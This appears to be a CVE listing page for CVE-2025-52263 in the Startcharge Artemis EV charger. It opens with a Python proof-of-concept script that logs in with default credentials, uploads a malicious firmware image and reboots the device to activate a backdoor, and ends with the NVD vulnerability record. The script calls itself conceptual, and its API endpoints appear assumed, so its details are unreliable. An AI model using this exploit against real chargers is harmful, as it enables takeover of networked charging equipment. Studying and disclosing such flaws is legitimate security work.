CVE-2025-52263

# CVE-2025-52263 PoC - Malicious Firmware Upload # Note: This is a conceptual PoC for educational purposes only # Target: Startcharge Artemis AC Charger 7-22 kW v1.0.4 import requests import json TARGET_IP = "192.168.1.100" USERNAME = "admin" PASSWORD = "admin123" # Default or weak credentials FIRMWARE_ENDPOINT = "/api/firmware/upload" def authenticate(target_ip, username, password): """Authenticate to the device web interface""" session = requests.Session() login_data = { "username": username, "password": password } response = session.post( f"http://{target_ip}/api/login", json=login_data, verify=False, timeout=10 ) return session if response.status_code == 200 else None def upload_malicious_firmware(session, target_ip, malicious_firmware_path): """Upload crafted firmware to trigger RCE""" with open(malicious_firmware_path, 'rb') as f: files = {'firmware': ('malicious.bin', f, 'application/octet-stream')} response = session.post( f"http://{target_ip}{FIRMWARE_ENDPOINT}", files=files, timeout=30 ) return response def trigger_reboot(session, target_ip): """Reboot device to execute malicious firmware""" response = session.post( f"http://{target_ip}/api/system/reboot", json={"confirm": True}, timeout=10 ) return response def main(): print(f"[*] Targeting {TARGET_IP}") print(f"[*] Authenticating...") session = authenticate(TARGET_IP, USERNAME, PASSWORD) if not session: print("[-] Authentication failed") return print("[+] Authentication successful") print("[*] Uploading malicious firmware...") response = upload_malicious_firmware(session, TARGET_IP, "malicious_firmware.bin") if response.status_code == 200: print("[+] Firmware uploaded successfully") print("[*] Triggering device reboot...") trigger_reboot(session, TARGET_IP) print("[+] Device rebooted - backdoor should be active") else: print(f"[-] Upload failed: {response.status_code}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-52263", "sourceIdentifier": "[email protected]", "published": "2025-10-27T14:15:40.807", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in the Web Configuration module of Startcharge Artemis AC Charger 7-22 kW v1.0.4 allows authenticated network-adjacent attackers to upload crafted firmware, leading to arbitrary code execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-494"}]}], "references": [{"url": "https://github.com/HaToan/CVEs/blob/main/starcharge/README.md", "source": "[email protected]"}, {"url": "https://www.starcharge.com/product/artemis/", "source": "[email protected]"}]}}